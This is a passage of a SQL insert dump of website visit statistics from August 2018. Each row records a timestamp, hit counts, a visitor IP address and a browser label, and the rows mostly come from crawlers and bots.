156',''),(284701,1533742120,1,0,1,0,'66.249.66.59',''),(284702,1533742571,1,1,0,0,'54.36.148.163','other'),(284703,1533743107,1,1,0,0,'54.36.149.84','other'),(284704,1533743168,1,1,0,0,'178.154.171.88','other'),(284705,1533743197,1,1,0,0,'54.36.148.156','other'),(284706,1533743273,1,1,0,0,'54.36.148.148','other'),(284707,1533743467,1,0,1,0,'66.249.66.156',''),(284708,1533743626,1,1,0,0,'54.36.149.36','other'),(284709,1533743698,2,1,1,0,'66.249.66.155',''),(284710,1533743793,1,1,0,0,'54.36.148.42','other'),(284711,1533743809,1,1,0,0,'54.36.148.87','other'),(284712,1533743822,1,1,0,0,'54.36.149.81','other'),(284713,1533743897,1,1,0,0,'54.36.148.91','other'),(284714,1533744283,1,1,0,0,'54.36.148.223','other'),(284715,1533744300,2,2,0,0,'46.211.122.140','other'),(284716,1533744363,1,1,0,0,'54.36.148.149','other'),(284717,1533744791,1,1,0,0,'8.29.198.25','other'),(284718,1533744800,1,1,0,0,'54.36.148.219','other'),(284719,1533744938,1,1,0,0,'185.220.101.34','other'),(284720,1533744940,1,1,0,0,'54.36.148.55','other'),(284721,1533744980,1,1,0,0,'188.230.43.254','other'),(284722,1533745338,1,1,0,0,'216.244.66.241','other'),(284723,1533745408,1,1,0,0,'54.36.148.235','other'),(284724,1533745441,1,1,0,0,'54.36.148.139','other'),(284725,1533745640,1,1,0,0,'66.249.66.61','chrome'),(284726,1533745683,1,1,0,0,'66.249.66.156','chrome'),(284727,1533745789,1,1,0,0,'54.36.148.217','other'),(284728,1533746379,1,1,0,0,'54.36.149.73','other'),(284729,1533746381,1,1,0,0,'54.36.148.124','other'),(284730,1533746401,1,1,0,0,'54.36.148.204','other'),(284731,1533746499,1,1,0,0,'87.250.224.46','other'),(284732,1533746803,1,1,0,0,'8.29.198.26','other'),(284733,1533746885,1,1,0,0,'91.196.178.88','chrome'),(284734,1533746897,2,2,0,0,'93.73.146.94','chrome'),(284735,1533746957,1,1,0,0,'54.36.148.85','other'),(284736,1533747272,1,1,0,0,'54.36.149.97','other'),(284737,1533747276,1,1,0,0,'54.36.148.109','other'),(284738,1533747303,1,1,0,0,'54.36.149.103','other'),(284739,1533747374,1,1,0,0,'188.230.43.254','other'),(284740,1533747575,1,1,0,0,'157.55.39.9','other'),(284741,1533747809,1,1,0,0,'54.36.148.56','other'),(284742,1533747970,1,1,0,0,'54.36.148.230','other'),(284743,1533748052,1,1,0,0,'54.36.149.70','other'),(284744,1533748203,1,1,0,0,'54.36.149.34','other'),(284745,1533748539,1,1,0,0,'178.175.148.19','other'),(284746,1533748603,1,1,0,0,'87.250.224.46','other'),(284747,1533748604,1,1,0,0,'141.8.142.74','other'),(284748,1533749011,1,1,0,0,'54.36.148.199','other'),(284749,1533749420,1,1,0,0,'54.36.148.14','other'),(284750,1533749465,1,1,0,0,'66.249.66.157','chrome'),(284751,1533749550,1,1,0,0,'92.113.189.235','chrome'),(284752,1533749662,1,1,0,0,'92.112.105.243','chrome'),(284753,1533750087,1,1,0,0,'54.36.148.84','other'),(284754,1533750253,1,1,0,0,'54.36.149.76','other'),(284755,1533750709,1,1,0,0,'54.36.148.97','other'),(284756,1533750925,1,1,0,0,'54.36.148.113','other'),(284757,1533751598,1,1,0,0,'193.194.127.228','chrome'),(284758,1533751985,1,1,0,0,'54.36.148.203','other'),(284759,1533752103,1,1,0,0,'54.36.149.85','other'),(284760,1533752124,1,1,0,0,'54.36.148.191','other'),(284761,1533752159,1,1,0,0,'87.118.122.30','other'),(284762,1533752307,1,1,0,0,'54.36.149.79','other'),(284763,1533752323,1,1,0,0,'54.36.148.166','other'),(284764,1533752829,1,1,0,0,'54.36.148.209','other'),(284765,1533753534,1,1,0,0,'54.36.149.28','other'),(284766,1533753544,1,1,0,0,'54.36.149.7','other'),(284767,1533753631,1,1,0,0,'54.36.149.59','other'),(284768,1533753687,1,1,0,0,'54.36.148.121','other'),(284769,1533753795,1,1,0,0,'54.36.148.132','other'),(284770,1533753952,1,1,0,0,'54.36.149.100','other'),(284771,1533753994,1,1,0,0,'54.36.148.208','other'),(284772,1533754123,1,0,1,0,'66.249.66.156',''),(284773,1533754368,1,1,0,0,'54.36.148.54','other'),(284774,1533754570,1,1,0,0,'54.36.149.15','other'),(284775,1533754594,1,1,0,0,'37.9.113.182','other'),(284776,1533754648,1,1,0,0,'54.36.148.47','other'),(284777,1533754770,1,0,1,0,'66.249.66.155',''),(284778,1533754957,1,1,0,0,'54.36.148.11','other'),(284779,1533755036,1,1,0,0,'54.36.148.140','other'),(284780,1533755066,2,2,0,0,'216.244.66.241','other'),(284781,1533755450,1,1,0,0,'54.36.148.88','other'),(284782,1533755526,1,1,0,0,'54.36.148.161','other'),(284783,1533755645,1,1,0,0,'8.29.198.27','other'),(284784,1533755799,1,1,0,0,'66.249.81.35','chrome'),(284785,1533755808,1,1,0,0,'66.249.81.40','chrome'),(284786,1533755908,1,1,0,0,'54.36.148.201','other'),(284787,1533756175,1,0,1,0,'66.249.66.61',''),(284788,1533756264,1,1,0,0,'54.36.149.7','other'),(284789,1533756461,1,0,1,0,'66.249.66.156',''),(284790,1533756487,1,1,0,0,'54.36.148.223','other'),(284791,1533756789,1,1,0,0,'54.36.148.154','other'),(284792,1533756793,1,1,0,0,'216.244.66.241','other'),(284793,1533757180,1,1,0,0,'54.36.148.126','other'),(284794,1533757241,1,1,0,0,'54.36.148.159','other'),(284795,1533757242,1,1,0,0,'141.8.142.74','other'),(284796,1533757544,1,1,0,0,'54.36.148.145','other'),(284797,1533757547,1,1,0,0,'54.36.148.143','other'),(284798,1533757673,1,1,0,0,'8.29.198.27','other'),(284799,1533757715,1,1,0,0,'54.36.149.64','other'),(284800,1533757764,1,1,0,0,'54.36.148.172','other'),(284801,1533757887,1,1,0,0,'54.36.148.100','other'),(284802,1533758052,1,1,0,0,'95.132.10.214','chrome'),(284803,1533758611,1,1,0,0,'91.121.109.55','other'),(284804,1533758676,1,1,0,0,'54.36.148.78','other'),(284805,1533758703,1,1,0,0,'54.36.148.230','other'),(284806,1533758982,1,1,0,0,'54.36.148.49','other'),(284807,1533759105,1,1,0,0,'178.154.171.88','other'),(284808,1533759211,1,1,0,0,'54.36.148.144','other'),(284809,1533759270,1,1,0,0,'54.36.148.73','other'),(284810,1533759351,1,1,0,0,'145.239.90.27','other'),(284811,1533759505,1,1,0,0,'141.8.142.74','other'),(284812,1533759806,1,1,0,0,'54.36.148.246','other'),(284813,1533760054,1,1,0,0,'178.154.171.88','other'),(284814,1533760140,1,1,0,0,'54.36.148.22','other'),(284815,1533760391,1,1,0,0,'54.36.148.42','other'),(284816,1533760639,1,1,0,0,'54.36.148.196','other'),(284817,1533760738,1,1,0,0,'54.36.148.20','other'),(284818,1533760810,2,2,0,0,'141.8.142.74','other'),(284819,1533760996,1,1,0,0,'54.36.148.93','other'),(284820,1533761091,1,1,0,0,'178.154.171.88','other'),(284821,1533761764,1,1,0,0,'54.36.148.171','other'),(284822,1533761798,1,1,0,0,'54.36.148.220','other'),(284823,1533762050,1,1,0,0,'54.36.148.90','other'),(284824,1533762203,1,1,0,0,'54.36.149.48','other'),(284825,1533762301,1,1,0,0,'54.36.149.80','other'),(284826,1533762318,1,1,0,0,'54.36.148.194','other'),(284827,1533762357,1,1,0,0,'54.36.149.17','other'),(284828,1533762387,1,1,0,0,'178.154.171.88','other'),(284829,1533762428,1,1,0,0,'54.36.149.81','other'),(284830,1533762945,1,1,0,0,'185.220.101.28','other'),(284831,1533763219,1,1,0,0,'54.36.148.19','other'),(284832,1533763278,1,1,0,0,'78.154.179.30','chrome'),(284833,1533763294,1,1,0,0,'54.36.148.84','other'),(284834,1533763350,1,1,0,0,'54.36.149.52','other'),(284835,1533763844,1,1,0,0,'54.36.149.69','other'),(284836,1533763858,1,1,0,0,'54.36.148.219','other'),(284837,1533764088,1,1,0,0,'54.36.149.61','other'),(284838,1533764689,2,2,0,0,'216.244.66.241','other'),(284839,1533764777,1,1,0,0,'54.36.148.244','other'),(284840,1533764929,1,1,0,0,'54.36.149.5','other'),(284841,1533765425,1,0,1,0,'66.249.75.195',''),(284842,1533765591,1,1,0,0,'54.36.148.43','other'),(284843,1533765608,1,1,0,0,'54.36.149.100','other'),(284844,1533765825,1,1,0,0,'54.36.148.21','other'),(284845,1533766291,1,1,0,0,'54.36.148.51','other'),(284846,1533766490,1,1,0,0,'8.29.198.25','other'),(284847,1533766554,1,1,0,0,'185.220.101.46','other'),(284848,1533766653,1,1,0,0,'178.154.171.88','other'),(284849,1533766864,1,1,0,0,'157.55.39.244','other'),(284850,1533767139,1,1,0,0,'54.36.148.75','other'),(284851,1533767190,1,1,0,0,'54.36.149.66','other'),(284852,1533767494,1,1,0,0,'54.36.148.22','other'),(284853,1533767921,3,3,0,0,'141.8.142.74','other'),(284854,1533767959,1,1,0,0,'54.36.148.154','other'),(284855,1533768156,2,2,0,0,'178.154.171.88','other'),(284856,1533768350,1,1,0,0,'54.36.148.208','other'),(284857,1533768541,1,1,0,0,'8.29.198.25','other'),(284858,1533768595,1,1,0,0,'54.36.148.111','other'),(284859,1533768763,1,1,0,0,'54.36.149.22','other'),(284860,1533768869,1,1,0,0,'54.36.148.42','other'),(284861,1533769196,1,1,0,0,'157.55.39.244','other'),(284862,1533769201,1,1,0,0,'54.36.148.107','other'),(284863,1533769245,1,1,0,0,'54.36.148.29','other'),(284864,1533769816,1,1,0,0,'216.244.66.241','other'),(284865,1533770127,1,1,0,0,'176.126.252.12','other'),(284866,1533770283,1,1,0,0,'54.36.149.17','other'),(284867,1533770372,1,1,0,0,'54.36.148.37','other'),(284868,1533770581,1,1,0,0,'54.36.148.160','other'),(284869,1533770841,1,1,0,0,'54.36.148.171','other'),(284870,1533771357,1,1,0,0,'54.36.148.188','other'),(284871,1533771718,1,1,0,0,'141.8.142.74','other'),(284872,1533771754,1,1,0,0,'54.36.148.28','other'),(284873,1533771799,1,1,0,0,'54.36.148.32','other'),(284874,1533771849,1,1,0,0,'54.36.149.96','other'),(284875,1533771888,1,1,0,0,'54.36.148.88','other'),(284876,1533772449,1,1,0,0,'209.54.47.202','other'),(284877,1533772520,1,1,0,0,'54.36.149.39','other'),(284878,1533772548,1,1,0,0,'178.154.171.88','other'),(284879,1533772550,1,1,0,0,'141.8.132.19','other'),(284880,1533772634,1,1,0,0,'141.8.142.74','other'),(284881,1533773275,1,1,0,0,'54.36.148.90','other'),(284882,1533773339,1,1,0,0,'54.36.148.32','other'),(284883,1533773536,1,1,0,0,'54.36.149.107','other'),(284884,1533773594,1,1,0,0,'54.36.149.48','other'),(284885,1533773743,1,1,0,0,'77.247.181.165','other'),(284886,1533773798,1,1,0,0,'54.36.148.201','other'),(284887,1533774078,1,1,0,0,'54.36.148.223','other'),(284888,1533774934,1,1,0,0,'54.36.148.234','other'),(284889,1533774977,1,1,0,0,'216.244.66.241','other'),(284890,1533774990,1,1,0,0,'54.36.149.25','other'),(284891,1533775063,1,1,0,0,'54.36.148.245','other'),(284892,1533775494,1,1,0,0,'54.36.149.19','other'),(284893,1533775500,2,2,0,0,'54.36.148.241','other'),(284894,1533775502,1,1,0,0,'51.255.65.46','other'),(284895,1533775507,14,14,0,0,'207.46.13.115','other'),(284896,1533775520,25,25,0,0,'157.55.39.244','other'),(284897,1533775546,12,12,0,0,'207.46.13.87','other'),(284898,1533775563,15,15,0,0,'157.55.39.9','other'),(284899,1533775904,1,1,0,0,'54.36.148.202','other'),(284900,1533775948,1,1,0,0,'216.244.66.241','other'),(284901,1533776845,1,1,0,0,'54.36.148.87','other'),(284902,1533776903,1,1,0,0,'141.8.142.74','other'),(284903,1533776998,1,1,0,0,'54.36.149.62','other'),(284904,1533777052,1,1,0,0,'54.36.148.32','other'),(284905,1533777069,1,1,0,0,'178.154.171.88','other'),(284906,1533777108,1,1,0,0,'54.36.148.173','other'),(284907,1533777323,1,1,0,0,'87.233.197.114','other'),(284908,1533777332,1,1,0,0,'8.29.198.25','other'),(284909,1533777418,1,1,0,0,'54.36.148.232','other'),(284910,1533777973,1,1,0,0,'54.36.148.20','other'),(284911,1533778094,1,1,0,0,'54.36.149.19','other'),(284912,1533778141,1,1,0,0,'54.36.148.109','other'),(284913,1533778201,1,1,0,0,'54.36.148.203','other'),(284914,1533778226,1,1,0,0,'54.36.149.24','other'),(284915,1533778789,1,1,0,0,'141.8.142.74','other'),(284916,1533778847,1,0,1,0,'66.249.75.195',''),(284917,1533779040,1,1,0,0,'54.36.148.220','other'),(284918,1533779166,1,1,0,0,'35.162.70.167','chrome'),(284919,1533779390,1,1,0,0,'54.36.148.239','other'),(284920,1533779420,1,1,0,0,'8.29.198.27','other'),(284921,1533779529,1,1,0,0,'54.36.148.224','other'),(284922,1533779568,1,1,0,0,'54.36.148.48','other'),(284923,1533779573,1,1,0,0,'54.36.148.92','other'),(284924,1533779778,1,1,0,0,'216.244.66.241','other'),(284925,1533779915,1,1,0,0,'54.36.148.87','other'),(284926,1533780164,1,1,0,0,'54.36.148.69','other'),(284927,1533780385,1,1,0,0,'54.36.148.222','other'),(284928,1533780391,83,83,0,0,'78.46.61.245','other'),(284929,1533780697,1,1,0,0,'141.8.142.74','other'),(284930,1533780942,1,1,0,0,'185.220.101.7','other'),(284931,1533780953,1,1,0,0,'54.36.148.184','other'),(284932,1533781707,1,1,0,0,'54.36.149.88','other'),(284933,1533781925,1,1,0,0,'54.36.148.209','other'),(284934,1533781941,1,1,0,0,'54.36.149.104','other'),(284935,1533782073,1,1,0,0,'54.36.149.27','other'),(284936,1533782379,1,1,0,0,'54.36.148.108','other'),(284937,1533782878,1,1,0,0,'54.36.149.78','other'),(284938,1533782914,1,1,0,0,'180.76.15.31','other'),(284939,1533782989,1,1,0,0,'54.36.149.3','other'),(284940,1533783121,1,1,0,0,'54.36.148.43','other'),(284941,1533783170,1,1,0,0,'54.36.148.111','other'),(284942,1533783383,1,1,0,0,'54.36.149.0','other'),(284943,1533783489,1,1,0,0,'216.244.66.241','other'),(284944,1533783909,1,1,0,0,'95.163.255.176','other'),(284945,1533784210,1,1,0,0,'157.55.39.244','other'),(284946,1533784232,1,1,0,0,'54.36.148.248','other'),(284947,1533784436,1,1,0,0,'54.36.148.11','other'),(284948,1533784523,1,1,0,0,'185.62.57.215','other'),(284949,1533784597,1,1,0,0,'54.36.148.123','other'),(284950,1533784680,1,1,0,0,'54.36.148.184','other'),(284951,1533784735,1,1,0,0,'54.36.148.148','other'),(284952,1533785025,1,1,0,0,'54.36.148.255','other'),(284953,1533785670,1,1,0,0,'54.36.149.85','other'),(284954,1533785716,1,1,0,0,'54.36.149.75','other'),(284955,1533785747,1,1,0,0,'54.36.148.217','other'),(284956,1533786163,1,1,0,0,'54.36.148.222','other'),(284957,1533786260,1,1,0,0,'216.244.66.241','other'),(284958,1533786274,1,1,0,0,'54.36.148.212','other'),(284959,1533786361,1,1,0,0,'54.36.149.101','other'),(284960,1533786503,1,1,0,0,'54.36.149.48','other'),(284961,1533786577,1,1,0,0,'54.36.148.208','other'),(284962,1533786939,1,1,0,0,'54.36.149.35','other'),(284963,1533786993,1,1,0,0,'54.36.149.37','other'),(284964,1533787415,1,1,0,0,'54.36.148.132','other'),(284965,1533787507,1,1,0,0,'54.36.148.247','other'),(284966,1533788124,1,1,0,0,'51.15.15.79','other'),(284967,1533788191,1,1,0,0,'8.29.198.27','other'),(284968,1533788292,6,6,0,0,'82.19.60.37','other'),(284969,1533788335,1,1,0,0,'54.36.149.25','other'),(284970,1533788466,1,1,0,0,'54.36.148.224','other'),(284971,1533788547,1,1,0,0,'54.36.149.4','other'),(284972,1533788780,2,2,0,0,'216.244.66.241','other'),(284973,1533788831,1,1,0,0,'54.36.148.254','other'),(284974,1533789106,1,1,0,0,'54.36.149.59','other'),(284975,1533789138,1,1,0,0,'78.154.179.30','chrome'),(284976,1533789185,1,1,0,0,'54.36.148.218','other'),(284977,1533789537,1,1,0,0,'54.36.149.65','other'),(284978,1533789595,52,52,0,0,'144.76.7.79','other'),(284979,1533789956,1,1,0,0,'54.36.149.14','other'),(284980,1533790114,1,1,0,0,'54.36.148.138','other'),(284981,1533790275,1,1,0,0,'8.29.198.26','other'),(284982,1533790312,1,1,0,0,'54.36.149.88','other'),(284983,1533790388,1,1,0,0,'91.196.178.169','chrome'),(284984,1533790427,1,1,0,0,'216.244.66.241','other'),(284985,1533790641,1,1,0,0,'54.36.148.130','other'),(284986,1533790678,1,1,0,0,'54.36.148.104','other'),(284987,1533790975,1,1,0,0,'54.36.149.92','other'),(284988,1533791004,1,1,0,0,'54.36.148.150','other'),(284989,1533791081,1,1,0,0,'91.196.178.88','chrome'),(284990,1533791225,1,1,0,0,'54.36.148.250','other'),(284991,1533791522,1,1,0,0,'54.36.148.181','other'),(284992,1533791585,1,1,0,0,'54.36.148.197','other'),(284993,1533791644,1,1,0,0,'54.36.148.128','other'),(284994,1533791723,1,1,0,0,'185.125.33.114','other'),(284995,1533791875,1,1,0,0,'54.36.148.141','other'),(284996,1533792027,1,1,0,0,'54.36.148.119','other'),(284997,1533792126,1,1,0,0,'54.36.148.137','other'),(284998,1533792480,1,1,0,0,'54.36.149.78','other'),(284999,1533792604,1,0,1,0,'66.249.75.199',''),(285000,1533792684,1,1,0,0,'52.53.201.78','chrome'),(285001,1533792818,1,1,0,0,'216.244.66.241','other'),(285002,1533793189,1,1,0,0,'54.36.149.68','other'),(285003,1533793197,1,1,0,0,'54.36.149.3','other'),(285004,1533793361,1,1,0,0,'141.8.132.19','other'),(285005,1533793697,1,1,0,0,'54.36.148.43','other'),(285006,1533793962,1,1,0,0,'216.244.66.241','other'),(285007,1533794240,2,2,0,0,'195.230.119.59','chrome'),(285008,1533794290,1,1,0,0,'54.36.148.219','other'),(285009,1533794307,1,0,1,0,'66.249.69.156',''),(285010,1533794324,1,1,0,0,'54.36.149.68','other'),(285011,1533794942,1,1,0,0,'54.36.149.20','other'),(285012,1533794954,1,1,0,0,'54.36.148.222','other'),(285013,1533795040,1,1,0,0,'54.36.149.34','other'),(285014,1533795232,1,1,0,0,'91.196.178.89','firefox'),(285015,1533795330,1,1,0,0,'54.36.148.183','other'),(285016,1533795349,1,1,0,0,'185.220.102.7','other'),(285017,1533795803,3,3,0,0,'69.58.178.59','other'),(285018,1533795831,1,1,0,0,'91.196.178.73','chrome'),(285019,1533796191,2,2,0,0,'216.244.66.241','other'),(285020,1533796210,1,1,0,0,'54.36.148.125','other'),(285021,1533796298,1,1,0,0,'54.36.149.88','other'),(285022,1533796532,1,1,0,0,'54.36.148.243','other'),(285023,1533797078,1,1,0,0,'54.36.148.84','other'),(285024,1533797149,1,1,0,0,'54.36.148.22','other'),(285025,1533797581,1,1,0,0,'178.154.171.88','other'),(285026,1533797763,1,1,0,0,'54.36.148.218','other'),(285027,1533797834,1,1,0,0,'194.44.121.243','chrome'),(285028,1533797897,1,1,0,0,'91.196.178.79','chrome'),(285029,1533798338,1,1,0,0,'54.36.149.66','other'),(285030,1533798562,1,1,0,0,'91.209.11.236','other'),(285031,1533798711,1,1,0,0,'54.36.148.203','other'),(285032,1533798941,1,1,0,0,'51.15.53.83','other'),(285033,1533798967,1,1,0,0,'54.36.149.6','other'),(285034,1533799042,1,1,0,0,'8.29.198.26','other'),(285035,1533799157,1,1,0,0,'54.36.148.93','other'),(285036,1533799158,1,1,0,0,'54.36.149.106','other'),(285037,1533799337,1,1,0,0,'91.196.178.131','chrome'),(285038,1533799383,1,1,0,0,'216.244.66.241','other'),(285039,1533799429,1,1,0,0,'54.36.148.167','other'),(285040,1533799600,1,1,0,0,'54.36.149.16','other'),(285041,1533799607,1,1,0,0,'178.154.171.88','other'),(285042,1533799828,1,1,0,0,'54.36.148.82','other'),(285043,1533800165,1,1,0,0,'91.196.178.88','chrome'),(285044,1533800372,1,1,0,0,'54.36.149.9','other'),(285045,1533800468,1,1,0,0,'141.8.142.74','other'),(285046,1533800689,1,1,0,0,'54.36.148.169','other'),(285047,1533800793,1,1,0,0,'54.36.148.125','other'),(285048,1533800890,1,1,0,0,'180.76.15.154','other'),(285049,1533800970,1,1,0,0,'54.36.148.173','other'),(285050,1533801146,1,1,0,0,'8.29.198.25','other'),(285051,1533801245,1,1,0,0,'46.174.125.28','chrome'),(285052,1533801276,2,2,0,0,'91.196.178.172','chrome'),(285053,1533801422,1,1,0,0,'78.111.190.184','chrome'),(285054,1533801424,1,1,0,0,'216.244.66.241','other'),(285055,1533801656,1,1,0,0,'54.36.149.62','other'),(285056,1533801694,1,1,0,0,'54.36.148.241','other'),(285057,1533802003,1,1,0,0,'54.36.148.161','other'),(285058,1533802105,1,1,0,0,'54.36.148.252','other'),(285059,1533802279,1,1,0,0,'37.55.153.235','chrome'),(285060,1533802548,1,1,0,0,'51.15.233.253','other'),(285061,1533802594,1,1,0,0,'54.36.149.30','other'),(285062,1533802596,1,1,0,0,'54.36.148.108','other'),(285063,1533802697,1,1,0,0,'54.36.149.83','other'),(285064,1533802797,2,2,0,0,'91.196.179.65','chrome'),(285065,1533803327,1,1,0,0,'54.36.148.129','other'),(285066,1533803397,1,1,0,0,'54.36.148.223','other'),(285067,1533803417,1,0,1,0,'66.249.75.195',''),(285068,1533803495,1,1,0,0,'37.54.141.229','firefox'),(285069,1533803747,1,1,0,0,'94.153.229.229','other'),(285070,1533803923,1,1,0,0,'46.174.125.28','chrome'),(285071,1533803961,1,1,0,0,'54.36.149.78','other'),(285072,1533804144,1,1,0,0,'54.36.148.42','other'),(285073,1533804206,1,1,0,0,'216.244.66.241','other'),(285074,1533804287,1,1,0,0,'54.36.148.249','other'),(285075,1533804335,1,1,0,0,'54.36.149.5','other'),(285076,1533804340,1,1,0,0,'54.36.148.188','other'),(285077,1533804389,1,1,0,0,'91.225.166.91','chrome'),(285078,1533804466,1,1,0,0,'91.124.41.186','chrome'),(285079,1533804536,1,1,0,0,'54.36.148.74','other'),(285080,1533804538,1,1,0,0,'54.36.148.199','other'),(285081,1533804564,1,1,0,0,'207.46.13.115','other'),(285082,1533804777,2,2,0,0,'195.69.221.54','chrome'),(285083,1533805360,1,1,0,0,'54.36.149.48','other'),(285084,1533805462,1,1,0,0,'54.36.149.32','other'),(285085,1533806090,1,1,0,0,'141.8.142.74','other'),(285086,1533806143,1,1,0,0,'91.196.178.79','firefox'),(285087,1533806262,1,1,0,0,'54.36.148.118','other'),(285088,1533806347,1,0,1,0,'66.249.69.156',''),(285089,1533806379,1,1,0,0,'54.36.148.175','other'),(285090,1533806655,2,2,0,0,'91.196.177.46','chrome'),(285091,1533806762,1,1,0,0,'178.154.171.88','other'),(285092,1533806802,1,0,1,0,'66.249.75.199',''),(285093,1533806817,1,1,0,0,'54.36.149.79','other'),(285094,1533806889,1,1,0,0,'54.36.148.15','other'),(285095,1533807073,1,1,0,0,'94.178.118.180','chrome'),(285096,1533807218,1,1,0,0,'216.244.66.241','other'),(285097,1533807325,2,2,0,0,'144.76.29.66','other'),(285098,1533807363,1,1,0,0,'54.36.149.44','other'),(285099,1533807496,1,1,0,0,'54.36.149.45','other'),(285100,1533807562,1,1,0,0,'54.36.149.55','other'),(285101,1533807596,1,1,0,0,'54.36.148.37','other'),(285102,1533808050,2,2,0,0,'141.8.142.74','other'),(285103,1533808153,1,1,0,0,'54.36.148.194','other'),(285104,1533808203,1,1,0,0,'54.36.148.144','other'),(285105,1533808281,1,1,0,0,'94.153.229.229','other'),(285106,1533808678,1,1,0,0,'54.36.148.234','other'),(285107,1533808774,1,1,0,0,'54.36.148.117','other'),(285108,1533809047,1,1,0,0,'54.36.148.198','other'),(285109,1533809074,1,1,0,0,'54.36.148.101','other'),(285110,1533809313,4,4,0,0,'216.244.66.241','other'),(285111,1533809331,1,1,0,0,'54.36.148.210','other'),(285112,1533809411,2,2,0,0,'141.8.142.74','other'),(285113,1533809538,1,1,0,0,'37.54.60.78','firefox'),(285114,1533809567,1,1,0,0,'54.36.149.28','other'),(285115,1533809615,1,1,0,0,'54.36.148.141','other'),(285116,1533809729,1,1,0,0,'51.15.57.167','other'),(285117,1533809911,1,1,0,0,'8.29.198.27','other'),(285118,1533810026,1,1,0,0,'37.53.206.124','msie'),(285119,1533810177,1,1,0,0,'54.36.148.138','other'),(285120,1533810237,1,1,0,0,'54.36.149.81','other'),(285121,1533810274,2,2,0,0,'91.196.178.43','chrome'),(285122,1533810462,1,1,0,0,'54.36.148.130','other'),(285123,1533810495,1,1,0,0,'54.36.149.99','other'),(285124,1533810527,1,1,0,0,'54.36.148.73','other'),(285125,1533810643,1,0,1,0,'66.249.75.153',''),(285126,1533810686,1,1,0,0,'91.196.178.172','chrome'),(285127,1533810773,1,1,0,0,'54.36.148.250','other'),(285128,1533811059,1,1,0,0,'216.244.66.241','other'),(285129,1533811085,1,1,0,0,'91.196.177.46','chrome'),(285130,1533811259,1,1,0,0,'54.36.148.103','other'),(285131,1533811998,1,1,0,0,'8.29.198.27','other'),(285132,1533812112,2,2,0,0,'216.244.66.241','other'),(285133,1533812515,1,1,0,0,'91.225.166.91','chrome'),(285134,1533812921,1,1,0,0,'141.8.142.74','other'),(285135,1533812928,1,1,0,0,'54.36.148.113','other'),(285136,1533813200,1,1,0,0,'54.36.148.235','other'),(285137,1533813333,1,1,0,0,'185.220.101.5','other'),(285138,1533813671,1,1,0,0,'54.36.148.75','other'),(285139,1533813694,1,1,0,0,'54.36.148.217','other'),(285140,1533813903,1,1,0,0,'141.8.142.74','other'),(285141,1533813915,1,1,0,0,'54.36.148.225','other'),(285142,1533814070,1,1,0,0,'94.178.32.177','chrome'),(285143,1533814290,2,2,0,0,'216.244.66.241','other'),(285144,1533814361,1,1,0,0,'54.36.148.46','other'),(285145,1533814797,1,1,0,0,'54.36.148.141','other'),(285146,1533815011,1,1,0,0,'54.36.148.33','other'),(285147,1533815024,1,1,0,0,'91.196.178.88','chrome'),(285148,1533815056,1,1,0,0,'54.36.148.58','other'),(285149,1533815117,1,1,0,0,'54.36.148.139','other'),(285150,1533815152,1,1,0,0,'207.46.13.87','other'),(285151,1533815221,1,1,0,0,'54.165.59.7','other'),(285152,1533815471,1,1,0,0,'91.196.178.188','chrome'),(285153,1533815540,1,1,0,0,'54.36.148.78','other'),(285154,1533815542,1,1,0,0,'54.36.148.129','other'),(285155,1533815727,1,1,0,0,'54.36.149.29','other'),(285156,1533815784,2,2,0,0,'91.196.179.33','chrome'),(285157,1533816352,1,1,0,0,'199.58.86.206','other'),(285158,1533816353,1,1,0,0,'91.196.177.15','chrome'),(285159,1533816406,1,1,0,0,'54.36.148.90','other'),(285160,1533816412,1,1,0,0,'54.36.148.167','other'),(285161,1533816414,2,2,0,0,'91.196.178.169','chrome'),(285162,1533816704,1,1,0,0,'216.244.66.241','other'),(285163,1533816948,1,1,0,0,'54.36.149.11','other'),(285164,1533816980,1,1,0,0,'77.111.247.59','chrome'),(285165,1533817158,1,1,0,0,'54.36.148.74','other'),(285166,1533817404,1,1,0,0,'54.36.148.93','other'),(285167,1533817538,1,1,0,0,'91.196.178.169','chrome'),(285168,1533817848,1,1,0,0,'91.124.13.213','chrome'),(285169,1533817884,1,1,0,0,'54.36.148.54','other'),(285170,1533818123,1,1,0,0,'54.36.148.88','other'),(285171,1533818202,1,1,0,0,'54.36.149.41','other'),(285172,1533818255,1,1,0,0,'54.36.148.46','other'),(285173,1533818339,1,1,0,0,'54.36.148.243','other'),(285174,1533818845,1,1,0,0,'195.64.136.162','chrome'),(285175,1533818949,1,1,0,0,'54.36.148.25','other'),(285176,1533819189,1,1,0,0,'54.36.149.70','other'),(285177,1533819629,1,0,1,0,'66.249.69.144',''),(285178,1533819867,1,1,0,0,'54.36.148.179','other'),(285179,1533819964,1,1,0,0,'157.55.39.9','other'),(285180,1533819972,1,1,0,0,'185.85.162.242','msie'),(285181,1533820383,1,1,0,0,'95.135.44.175','chrome'),(285182,1533820537,1,1,0,0,'176.126.252.12','other'),(285183,1533820768,1,1,0,0,'8.29.198.25','other'),(285184,1533820922,1,1,0,0,'54.36.148.241','other'),(285185,1533821273,1,1,0,0,'54.36.149.69','other'),(285186,1533821366,1,1,0,0,'54.36.148.37','other'),(285187,1533821647,1,1,0,0,'54.36.148.49','other'),(285188,1533821790,1,1,0,0,'54.36.148.225','other'),(285189,1533821857,1,1,0,0,'54.36.148.251','other'),(285190,1533822067,2,2,0,0,'178.154.171.88','other'),(285191,1533822113,1,1,0,0,'82.207.122.160','firefox'),(285192,1533822145,1,1,0,0,'54.36.148.183','other'),(285193,1533822216,1,1,0,0,'54.36.148.42','other'),(285194,1533822259,1,1,0,0,'54.36.148.98','other'),(285195,1533822580,1,1,0,0,'54.36.148.185','other'),(285196,1533822601,1,1,0,0,'54.36.148.231','other'),(285197,1533822628,1,1,0,0,'54.36.148.93','other'),(285198,1533822666,1,1,0,0,'54.36.148.156','other'),(285199,1533822870,1,1,0,0,'8.29.198.25','other'),(285200,1533822998,1,1,0,0,'54.36.148.158','other'),(285201,1533823026,1,1,0,0,'37.9.113.100','other'),(285202,1533823212,1,1,0,0,'54.36.148.161','other'),(285203,1533823295,1,1,0,0,'54.36.149.47','other'),(285204,1533823505,1,1,0,0,'54.36.148.202','other'),(285205,1533823617,1,1,0,0,'54.36.148.209','other'),(285206,1533823644,1,1,0,0,'54.36.148.111','other'),(285207,1533823698,1,1,0,0,'91.196.177.15','chrome'),(285208,1533823865,1,1,0,0,'54.36.148.136','other'),(285209,1533823992,1,1,0,0,'54.36.148.246','other'),(285210,1533824126,1,1,0,0,'51.15.86.162','other'),(285211,1533824182,1,1,0,0,'54.36.149.90','other'),(285212,1533824183,1,1,0,0,'54.36.148.232','other'),(285213,1533824527,1,1,0,0,'54.36.149.32','other'),(285214,1533824534,1,1,0,0,'138.201.239